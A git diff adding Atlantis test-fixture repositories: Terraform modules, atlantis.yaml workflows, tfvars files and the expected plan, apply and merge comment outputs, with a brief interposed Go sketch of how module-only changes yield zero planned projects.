index 0000000000..caea5e6434
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-production.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `production` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-plan-staging.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-staging.txt
new file mode 100644
index 0000000000..0e77a94421
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-staging.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `staging` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/modules-yaml/modules/null/main.tf b/server/testfixtures/test-repos/modules-yaml/modules/null/main.tf
new file mode 100644
index 0000000000..14f6a189c1
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/modules/null/main.tf
@@ -0,0 +1,10 @@
+variable "var" {}
+resource "null_resource" "this" {
+}
+output "var" {
+ value = "${var.var}"
+}
+
+output "workspace" {
+ value = "${terraform.workspace}"
+}
diff --git a/server/testfixtures/test-repos/modules-yaml/production/main.tf b/server/testfixtures/test-repos/modules-yaml/production/main.tf
new file mode 100644
index 0000000000..94a103ffba
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/production/main.tf
@@ -0,0 +1,7 @@
+module "null" {
+ source = "../modules/null"
+ var = "production"
+}
+output "var" {
+ value = "${module.null.var}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules-yaml/staging/main.tf b/server/testfixtures/test-repos/modules-yaml/staging/main.tf
new file mode 100644
index 0000000000..15fa81303a
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/staging/main.tf
@@ -0,0 +1,7 @@
+module "null" {
+ source = "../modules/null"
+ var = "staging"
+}
+output "var" {
+ value = "${module.null.var}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules/exp-output-apply-production.txt b/server/testfixtures/test-repos/modules/exp-output-apply-production.txt
new file mode 100644
index 0000000000..f0608bcf22
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-apply-production.txt
@@ -0,0 +1,13 @@
+Ran Apply in dir: `production` workspace: `default`
+```diff
+module.null.null_resource.this: Creating...
+module.null.null_resource.this: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = production
+
+```
+
diff --git a/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt
new file mode 100644
index 0000000000..ffc7878fe5
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt
@@ -0,0 +1,13 @@
+Ran Apply in dir: `staging` workspace: `default`
+```diff
+module.null.null_resource.this: Creating...
+module.null.null_resource.this: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = staging
+
+```
+
diff --git a/server/testfixtures/test-repos/modules/exp-output-autoplan-only-modules.txt b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-modules.txt
new file mode 100644
index 0000000000..63b09ca64f
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-modules.txt
@@ -0,0 +1,2 @@
+Ran `plan` in 0 projects because Atlantis detected no Terraform changes or could not determine where to run `plan`.
+
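This `modules` repo has no atlantis.yaml, so a change that only touches `modules/` yields the 0-projects message above: module directories aren't plannable projects on their own. A toy illustration of that default detection; this is an assumption about the heuristic, not the real Atlantis project finder:

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// detectProjects is a toy default project finder: each directory with a
// modified .tf file is a project, except directories under a "modules"
// path component (assumed unplannable on their own).
func detectProjects(modifiedFiles []string) []string {
	seen := map[string]bool{}
	var projects []string
	for _, f := range modifiedFiles {
		if filepath.Ext(f) != ".tf" {
			continue
		}
		dir := filepath.Dir(f)
		if seen[dir] || underModules(dir) {
			continue
		}
		seen[dir] = true
		projects = append(projects, dir)
	}
	return projects
}

func underModules(dir string) bool {
	for _, part := range strings.Split(dir, "/") {
		if part == "modules" {
			return true
		}
	}
	return false
}

func main() {
	fmt.Println(detectProjects([]string{"modules/null/main.tf"})) // []
	fmt.Println(detectProjects([]string{"staging/main.tf"}))      // [staging]
}
```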
diff --git a/server/testfixtures/test-repos/modules/exp-output-autoplan-only-staging.txt b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-staging.txt
new file mode 100644
index 0000000000..0e77a94421
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-staging.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `staging` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt b/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt
new file mode 100644
index 0000000000..9c553b9717
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt
@@ -0,0 +1,4 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- dir: `production` workspace: `default`
+- dir: `staging` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt b/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt
new file mode 100644
index 0000000000..95dde446ff
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- dir: `staging` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules/exp-output-merge.txt b/server/testfixtures/test-repos/modules/exp-output-merge.txt
new file mode 100644
index 0000000000..9080217904
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-merge.txt
@@ -0,0 +1,4 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- dir: `staging` workspace: `default`
+- dir: `.` workspace: `default`
diff --git a/server/testfixtures/test-repos/modules/exp-output-plan-production.txt b/server/testfixtures/test-repos/modules/exp-output-plan-production.txt
new file mode 100644
index 0000000000..caea5e6434
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-plan-production.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `production` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt b/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt
new file mode 100644
index 0000000000..0e77a94421
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `staging` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/modules/modules/null/main.tf b/server/testfixtures/test-repos/modules/modules/null/main.tf
new file mode 100644
index 0000000000..14f6a189c1
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/modules/null/main.tf
@@ -0,0 +1,10 @@
+variable "var" {}
+resource "null_resource" "this" {
+}
+output "var" {
+ value = "${var.var}"
+}
+
+output "workspace" {
+ value = "${terraform.workspace}"
+}
diff --git a/server/testfixtures/test-repos/modules/production/main.tf b/server/testfixtures/test-repos/modules/production/main.tf
new file mode 100644
index 0000000000..94a103ffba
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/production/main.tf
@@ -0,0 +1,7 @@
+module "null" {
+ source = "../modules/null"
+ var = "production"
+}
+output "var" {
+ value = "${module.null.var}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules/staging/main.tf b/server/testfixtures/test-repos/modules/staging/main.tf
new file mode 100644
index 0000000000..15fa81303a
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/staging/main.tf
@@ -0,0 +1,7 @@
+module "null" {
+ source = "../modules/null"
+ var = "staging"
+}
+output "var" {
+ value = "${module.null.var}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple-yaml/atlantis.yaml b/server/testfixtures/test-repos/simple-yaml/atlantis.yaml
new file mode 100644
index 0000000000..62e6047617
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/atlantis.yaml
@@ -0,0 +1,24 @@
+version: 2
+projects:
+- dir: .
+ workspace: default
+ workflow: default
+- dir: .
+ workspace: staging
+ workflow: staging
+workflows:
+ default:
+ # Only plan is specified, so the default apply workflow should be used.
+ plan:
+ steps:
+ - init
+ - plan:
+ extra_args: [-var, var=fromconfig]
+ staging:
+ plan:
+ steps:
+ - init
+ - plan:
+ extra_args: [-var-file, staging.tfvars]
+ apply:
+ steps: [apply]
diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt
new file mode 100644
index 0000000000..93654c7deb
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt
@@ -0,0 +1,14 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = fromconfig
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt
new file mode 100644
index 0000000000..6aed57ab53
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt
@@ -0,0 +1,14 @@
+Ran Apply in dir: `.` workspace: `staging`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = fromfile
+workspace = staging
+
+```
+
diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt
new file mode 100644
index 0000000000..b539452a7f
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt
@@ -0,0 +1,51 @@
+Ran Plan for 2 projects:
+1. workspace: `default` dir: `.`
+1. workspace: `staging` dir: `.`
+
+### 1. workspace: `default` dir: `.`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+### 2. workspace: `staging` dir: `.`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+
diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt
new file mode 100644
index 0000000000..9ac6047224
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- dir: `.` workspaces: `default`, `staging`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple-yaml/main.tf b/server/testfixtures/test-repos/simple-yaml/main.tf
new file mode 100644
index 0000000000..39f891a7b0
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/main.tf
@@ -0,0 +1,15 @@
+resource "null_resource" "simple" {
+ count = "1"
+}
+
+variable "var" {
+ default = "default"
+}
+
+output "var" {
+ value = "${var.var}"
+}
+
+output "workspace" {
+ value = "${terraform.workspace}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple-yaml/staging.tfvars b/server/testfixtures/test-repos/simple-yaml/staging.tfvars
new file mode 100644
index 0000000000..6cf6f711e1
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/staging.tfvars
@@ -0,0 +1 @@
+var= "fromfile"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt
new file mode 100644
index 0000000000..59398bd4e5
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt
@@ -0,0 +1,14 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = default_workspace
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt
new file mode 100644
index 0000000000..e167833832
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt
@@ -0,0 +1,14 @@
+Ran Apply in dir: `.` workspace: `new_workspace`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = new_workspace
+workspace = new_workspace
+
+```
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt
new file mode 100644
index 0000000000..bd2cd1207b
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt
@@ -0,0 +1,14 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = overridden
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-apply.txt b/server/testfixtures/test-repos/simple/exp-output-apply.txt
new file mode 100644
index 0000000000..ea31933908
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-apply.txt
@@ -0,0 +1,14 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = default
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-new-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-new-workspace.txt
new file mode 100644
index 0000000000..2aea0c8cb6
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-new-workspace.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `.` workspace: `new_workspace`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var-default-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var-default-workspace.txt
new file mode 100644
index 0000000000..15a712c428
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var-default-workspace.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `.` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-atlantis-plan.txt b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan.txt
new file mode 100644
index 0000000000..15a712c428
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `.` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-autoplan.txt b/server/testfixtures/test-repos/simple/exp-output-autoplan.txt
new file mode 100644
index 0000000000..15a712c428
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-autoplan.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `.` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt b/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt
new file mode 100644
index 0000000000..dad5ee4ab8
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- dir: `.` workspaces: `default`, `new_workspace`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple/exp-output-merge.txt b/server/testfixtures/test-repos/simple/exp-output-merge.txt
new file mode 100644
index 0000000000..70df2f2518
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-merge.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- dir: `.` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple/main.tf b/server/testfixtures/test-repos/simple/main.tf
new file mode 100644
index 0000000000..588b3db4df
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/main.tf
@@ -0,0 +1,15 @@
+resource "null_resource" "simple" {
+ count = 1
+}
+
+variable "var" {
+ default = "default"
+}
+
+output "var" {
+ value = "${var.var}"
+}
+
+output "workspace" {
+ value = "${terraform.workspace}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/atlantis.yaml b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/atlantis.yaml
new file mode 100644
index 0000000000..8dbfe353ec
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/atlantis.yaml
@@ -0,0 +1,29 @@
+version: 2
+projects:
+- dir: .
+ name: default
+ workflow: default
+ autoplan:
+ enabled: false
+- dir: .
+ workflow: staging
+ name: staging
+ autoplan:
+ enabled: false
+workflows:
+ default:
+ plan:
+ steps:
+ - run: rm -rf .terraform
+ - init:
+ extra_args: [-backend-config=default.backend.tfvars]
+ - plan:
+ extra_args: [-var-file=default.tfvars]
+ staging:
+ plan:
+ steps:
+ - run: rm -rf .terraform
+ - init:
+ extra_args: [-backend-config=staging.backend.tfvars]
+ - plan:
+ extra_args: [-var-file, staging.tfvars]
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.backend.tfvars
new file mode 100644
index 0000000000..a03acf6e2d
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.backend.tfvars
@@ -0,0 +1 @@
+path = "default.tfstate"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.tfvars
new file mode 100644
index 0000000000..c5e157a5d5
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.tfvars
@@ -0,0 +1 @@
+var = "default"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-default.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-default.txt
new file mode 100644
index 0000000000..9ccb1a95d6
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-default.txt
@@ -0,0 +1,21 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+The state of your infrastructure has been saved to the path
+below. This state is required to modify and destroy your
+infrastructure, so keep it safe. To inspect the complete state
+use the `terraform show` command.
+
+State path: default.tfstate
+
+Outputs:
+
+var = default
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-staging.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-staging.txt
new file mode 100644
index 0000000000..e0d34d0905
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-staging.txt
@@ -0,0 +1,21 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+The state of your infrastructure has been saved to the path
+below. This state is required to modify and destroy your
+infrastructure, so keep it safe. To inspect the complete state
+use the `terraform show` command.
+
+State path: staging.tfstate
+
+Outputs:
+
+var = staging
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt
new file mode 100644
index 0000000000..70df2f2518
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- dir: `.` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-default.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-default.txt
new file mode 100644
index 0000000000..15a712c428
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-default.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `.` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-staging.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-staging.txt
new file mode 100644
index 0000000000..15a712c428
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-staging.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `.` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/main.tf b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/main.tf
new file mode 100644
index 0000000000..d4d77ff4e7
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/main.tf
@@ -0,0 +1,19 @@
+terraform {
+ backend "local" {
+ }
+}
+
+resource "null_resource" "simple" {
+ count = 1
+}
+
+variable "var" {
+}
+
+output "var" {
+ value = "${var.var}"
+}
+
+output "workspace" {
+ value = "${terraform.workspace}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.backend.tfvars
new file mode 100644
index 0000000000..e8133a2b59
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.backend.tfvars
@@ -0,0 +1 @@
+path = "staging.tfstate"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.tfvars
new file mode 100644
index 0000000000..34f4bbb990
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.tfvars
@@ -0,0 +1 @@
+var = "staging"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml b/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml
new file mode 100644
index 0000000000..a6f517140b
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml
@@ -0,0 +1,26 @@
+version: 2
+projects:
+- dir: .
+ name: default
+ workflow: default
+- dir: .
+ workflow: staging
+ name: staging
+workflows:
+ default:
+ plan:
+ steps:
+ - run: rm -rf .terraform
+ - init:
+ extra_args: [-backend-config=default.backend.tfvars]
+ - plan:
+ extra_args: [-var-file=default.tfvars]
+ - run: echo workspace=$WORKSPACE
+ staging:
+ plan:
+ steps:
+ - run: rm -rf .terraform
+ - init:
+ extra_args: [-backend-config=staging.backend.tfvars]
+ - plan:
+ extra_args: [-var-file, staging.tfvars]
diff --git a/server/testfixtures/test-repos/tfvars-yaml/default.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml/default.backend.tfvars
new file mode 100644
index 0000000000..a03acf6e2d
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/default.backend.tfvars
@@ -0,0 +1 @@
+path = "default.tfstate"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/default.tfvars b/server/testfixtures/test-repos/tfvars-yaml/default.tfvars
new file mode 100644
index 0000000000..c5e157a5d5
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/default.tfvars
@@ -0,0 +1 @@
+var = "default"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt
new file mode 100644
index 0000000000..9ccb1a95d6
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt
@@ -0,0 +1,21 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
